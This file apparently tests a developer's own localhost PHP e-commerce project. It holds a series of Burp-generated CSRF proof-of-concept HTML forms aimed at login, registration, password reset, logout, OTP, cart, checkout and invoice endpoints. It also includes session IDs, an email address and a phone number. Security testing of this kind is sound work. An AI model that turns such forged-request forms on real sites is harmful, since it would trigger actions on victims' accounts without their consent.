<?php $_SESSION['csrf_token'] = uniqid() ?>
<h1>Login</h1>
<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="POST" action="http://localhost:80/BhaskarProject/ecommerce%20website/frontend/login_submit.php">
		<input type="text" name="recently_viewed" value="a:12:{i:20;s:2:&quot;33&quot;;i:74;s:2:&quot;29&quot;;i:76;s:2:&quot;37&quot;;i:77;s:2:&quot;38&quot;;i:80;s:2:&quot;18&quot;;i:106;s:2:&quot;30&quot;;i:107;s:2:&quot;31&quot;;i:108;s:2:&quot;14&quot;;i:115;s:2:&quot;17&quot;;i:116;s:2:&quot;32&quot;;i:117;s:2:&quot;84&quot;;i:134;s:2:&quot;85&quot;;}">
		<input type="text" name="PHPSESSID" value="ojtvhrvoqrktmhafutq7fuq55h">
		<input type="text" name="is_legal" value="yes">
        <input type="text" name="login_form_token" value="<?php echo $_SESSION['csrf_token'] ?>">
		<input type="text" name="email" value="sss@hotmail.com">
		<input type="text" name="password" value="4rf..">
		<input type="submit" value="Send">
	</form>
</body>
</html>

<h1>Register</h1>
<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="POST" action="http://localhost:80/BhaskarProject/ecommerce%20website/frontend/register_submit.php">
		<input type="text" name="recently_viewed" value="a:12:{i:20;s:2:&quot;33&quot;;i:74;s:2:&quot;29&quot;;i:76;s:2:&quot;37&quot;;i:77;s:2:&quot;38&quot;;i:80;s:2:&quot;18&quot;;i:106;s:2:&quot;30&quot;;i:107;s:2:&quot;31&quot;;i:108;s:2:&quot;14&quot;;i:115;s:2:&quot;17&quot;;i:116;s:2:&quot;32&quot;;i:117;s:2:&quot;84&quot;;i:134;s:2:&quot;85&quot;;}">
		<input type="text" name="PHPSESSID" value="ojtvhrvoqrktmhafutq7fuq55h">
		<input type="text" name="is_legal" value="yes">
        <input type="text" name="register_form_token" value="<?php echo $_SESSION['csrf_token'] ?>">
		<input type="text" name="name" value="Popjak">
		<input type="text" name="email" value="dekavaskar@gmail.com">
		<input type="text" name="mobile" value="7002661895">
		<input type="text" name="password" value="5Rf..">
		<input type="submit" value="Send">
	</form>
</body>
</html>

<h1>Recover Password</h1>
<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="POST" action="http://localhost:80/BhaskarProject/ecommerce%20website/frontend/password_reset_link.php">
		<input type="text" name="recently_viewed" value="a:12:{i:20;s:2:&quot;33&quot;;i:74;s:2:&quot;29&quot;;i:76;s:2:&quot;37&quot;;i:77;s:2:&quot;38&quot;;i:80;s:2:&quot;18&quot;;i:106;s:2:&quot;30&quot;;i:107;s:2:&quot;31&quot;;i:108;s:2:&quot;14&quot;;i:115;s:2:&quot;17&quot;;i:116;s:2:&quot;32&quot;;i:117;s:2:&quot;84&quot;;i:134;s:2:&quot;85&quot;;}">
		<input type="text" name="is_legal" value="yes">
		<input type="text" name="PHPSESSID" value="00ik4fipdim33pv61cshuv5o2s">
		<input type="text" name="recover_password_form_token" value="<?php echo $_SESSION['csrf_token'] ?>">
		<input type="text" name="email" value="d">
		<input type="submit" value="Send">
	</form>
</body>
</html>

<h1>Logout</h1>
<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="POST" action="http://localhost:80/BhaskarProject/ecommerce%20website/frontend/logout.php">
		<input type="text" name="recently_viewed" value="a:12:{i:20;s:2:&quot;33&quot;;i:74;s:2:&quot;29&quot;;i:76;s:2:&quot;37&quot;;i:77;s:2:&quot;38&quot;;i:80;s:2:&quot;18&quot;;i:106;s:2:&quot;30&quot;;i:107;s:2:&quot;31&quot;;i:108;s:2:&quot;14&quot;;i:115;s:2:&quot;17&quot;;i:116;s:2:&quot;32&quot;;i:117;s:2:&quot;84&quot;;i:134;s:2:&quot;85&quot;;}">
		<input type="text" name="is_legal" value="yes">
		<input type="text" name="PHPSESSID" value="6u20tc2jaslof3l8dsbmt95a14">
		<input type="text" name="logout_form_token" value="<?php echo $_SESSION['csrf_token'] ?>">
		<input type="submit" value="Send">
	</form>
</body>
</html>

<h1>Email Verification</h1>
<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="POST" action="http://localhost:80/BhaskarProject/ecommerce%20website/frontend/send_otp.php">
		<input type="text" name="recently_viewed" value="a:12:{i:20;s:2:&quot;33&quot;;i:74;s:2:&quot;29&quot;;i:76;s:2:&quot;37&quot;;i:77;s:2:&quot;38&quot;;i:80;s:2:&quot;18&quot;;i:106;s:2:&quot;30&quot;;i:107;s:2:&quot;31&quot;;i:108;s:2:&quot;14&quot;;i:115;s:2:&quot;17&quot;;i:116;s:2:&quot;32&quot;;i:117;s:2:&quot;84&quot;;i:134;s:2:&quot;85&quot;;}">
		<input type="text" name="is_legal" value="yes">
		<input type="text" name="PHPSESSID" value="g0ijnq0dau9gkgef6eiif95jou">
		<input type="text" name="email" value="d">
		<input type="text" name="type" value="email">
		<input type="text" id="email_and_mobile_registration_form_token" value="<?php echo $_SESSION['csrf_token'] ?>">
		<input type="submit" value="Send">
	</form>
</body>
</html>

<h1>Mobile Verification</h1>
<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="POST" action="http://localhost:80/BhaskarProject/ecommerce%20website/frontend/send_otp.php">
		<input type="text" name="recently_viewed" value="a:12:{i:20;s:2:&quot;33&quot;;i:74;s:2:&quot;29&quot;;i:76;s:2:&quot;37&quot;;i:77;s:2:&quot;38&quot;;i:80;s:2:&quot;18&quot;;i:106;s:2:&quot;30&quot;;i:107;s:2:&quot;31&quot;;i:108;s:2:&quot;14&quot;;i:115;s:2:&quot;17&quot;;i:116;s:2:&quot;32&quot;;i:117;s:2:&quot;84&quot;;i:134;s:2:&quot;85&quot;;}">
		<input type="text" name="is_legal" value="yes">
		<input type="text" name="PHPSESSID" value="g0ijnq0dau9gkgef6eiif95jou">
		<input type="text" name="email_and_mobile_registration_form_token" value="64bd662b24a25">
		<input type="text" name="mobile" value="3">
		<input type="text" name="type" value="mobile">
		<input type="text" id="email_and_mobile_registration_form_token" value="<?php echo $_SESSION['csrf_token'] ?>">
		<input type="submit" value="Send">
	</form>
</body>
</html>

<h1>Add product to cart</h1>
<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="POST" action="http://localhost:80/BhaskarProject/ecommerce%20website/frontend/manage_cart.php">
		<input type="text" name="recently_viewed" value="a:12:{i:20;s:2:&quot;33&quot;;i:74;s:2:&quot;29&quot;;i:76;s:2:&quot;37&quot;;i:77;s:2:&quot;38&quot;;i:80;s:2:&quot;18&quot;;i:106;s:2:&quot;30&quot;;i:108;s:2:&quot;14&quot;;i:115;s:2:&quot;17&quot;;i:116;s:2:&quot;32&quot;;i:117;s:2:&quot;84&quot;;i:134;s:2:&quot;85&quot;;i:135;s:2:&quot;31&quot;;}">
		<input type="text" name="is_legal" value="yes">
		<input type="text" name="PHPSESSID" value="nr8ktiqbi31cje61kfjfhcml7g">
		<input type="text" name="pid" value="c1VyMDVyL3crUStZY1ZnS1pxVXpkZz09">
		<input type="text" name="qty" value="1">
		<input type="text" name="type" value="add">
		<input type="text" name="token" value="<?php echo $_SESSION['csrf_token'] ?>">
		<input type="submit" value="Send">
	</form>
</body>
</html>

<h1>Update(Increase/Decrease) quantity in cart</h1>
<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="POST" action="http://localhost:80/BhaskarProject/ecommerce%20website/frontend/manage_cart.php">
		<input type="text" name="recently_viewed" value="a:12:{i:20;s:2:&quot;33&quot;;i:74;s:2:&quot;29&quot;;i:76;s:2:&quot;37&quot;;i:77;s:2:&quot;38&quot;;i:80;s:2:&quot;18&quot;;i:106;s:2:&quot;30&quot;;i:108;s:2:&quot;14&quot;;i:115;s:2:&quot;17&quot;;i:116;s:2:&quot;32&quot;;i:117;s:2:&quot;84&quot;;i:134;s:2:&quot;85&quot;;i:149;s:2:&quot;31&quot;;}">
		<input type="text" name="is_legal" value="yes">
		<input type="text" name="PHPSESSID" value="q2sf5kqe7p8329dftjbctnsi7b">
		<input type="text" name="pid" value="c1VyMDVyL3crUStZY1ZnS1pxVXpkZz09">
		<input type="text" name="qty" value="2">
		<input type="text" name="type" value="update">
		<input type="text" name="token" value="<?php echo $_SESSION['csrf_token'] ?>">
		<input type="submit" value="Send">
	</form>
</body>
</html>

<h1>Remove product from cart</h1>
<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="POST" action="http://localhost:80/BhaskarProject/ecommerce%20website/frontend/manage_cart.php">
		<input type="text" name="recently_viewed" value="a:12:{i:20;s:2:&quot;33&quot;;i:74;s:2:&quot;29&quot;;i:76;s:2:&quot;37&quot;;i:77;s:2:&quot;38&quot;;i:80;s:2:&quot;18&quot;;i:106;s:2:&quot;30&quot;;i:108;s:2:&quot;14&quot;;i:115;s:2:&quot;17&quot;;i:116;s:2:&quot;32&quot;;i:117;s:2:&quot;84&quot;;i:134;s:2:&quot;85&quot;;i:149;s:2:&quot;31&quot;;}">
		<input type="text" name="is_legal" value="yes">
		<input type="text" name="PHPSESSID" value="q2sf5kqe7p8329dftjbctnsi7b">
		<input type="text" name="pid" value="c1VyMDVyL3crUStZY1ZnS1pxVXpkZz09">
		<input type="text" name="qty" value="undefined">
		<input type="text" name="type" value="remove">
		<input type="text" name="token" value="64c03d9143d9b">
		<input type="submit" value="Send">
	</form>
</body>
</html>

<h1>Proceed to checkout(Fillup details)</h1>
<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="POST" action="http://localhost:80/BhaskarProject/ecommerce%20website/frontend/checkout.php">
		<input type="text" name="recently_viewed" value="a:12:{i:20;s:2:&quot;33&quot;;i:74;s:2:&quot;29&quot;;i:76;s:2:&quot;37&quot;;i:77;s:2:&quot;38&quot;;i:80;s:2:&quot;18&quot;;i:106;s:2:&quot;30&quot;;i:108;s:2:&quot;14&quot;;i:115;s:2:&quot;17&quot;;i:116;s:2:&quot;32&quot;;i:117;s:2:&quot;84&quot;;i:134;s:2:&quot;85&quot;;i:149;s:2:&quot;31&quot;;}">
		<input type="text" name="is_legal" value="yes">
		<input type="text" name="PHPSESSID" value="q2sf5kqe7p8329dftjbctnsi7b">
		<input type="text" name="pincode" value="3">
		<input type="text" name="state" value="s">
		<input type="text" name="house_no" value="s">
		<input type="text" name="street_address" value="s">
		<input type="text" name="city" value="s">
		<input type="text" name="payment_type" value="cod">
		<input type="text" name="submit" value="Place Order">
		<input type="text" name="token" value="<?php echo $_SESSION['csrf_token'] ?>">
		<input type="submit" value="Send">
	</form>
</body>
</html>

<h1>PDF(Invoice) Download</h1>
<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="GET" action="http://localhost:80/BhaskarProject/ecommerce%20website/frontend/download_invoice.php?id=R25Fb29vVnAvR1ZaamxrWDdPdWVBUT09">
		<input type="text" name="id" value="R25Fb29vVnAvR1ZaamxrWDdPdWVBUT09">
		<input type="text" name="recently_viewed" value="a:12:{i:20;s:2:&quot;33&quot;;i:74;s:2:&quot;29&quot;;i:76;s:2:&quot;37&quot;;i:77;s:2:&quot;38&quot;;i:80;s:2:&quot;18&quot;;i:106;s:2:&quot;30&quot;;i:116;s:2:&quot;32&quot;;i:117;s:2:&quot;84&quot;;i:134;s:2:&quot;85&quot;;i:149;s:2:&quot;31&quot;;i:150;s:2:&quot;14&quot;;i:151;s:2:&quot;17&quot;;}">
		<input type="text" name="is_legal" value="yes">
		<input type="text" name="PHPSESSID" value="2cok03fbniim4lbes9o6k6rgjl">
		<input type="submit" value="Send">
	</form>
</body>
</html>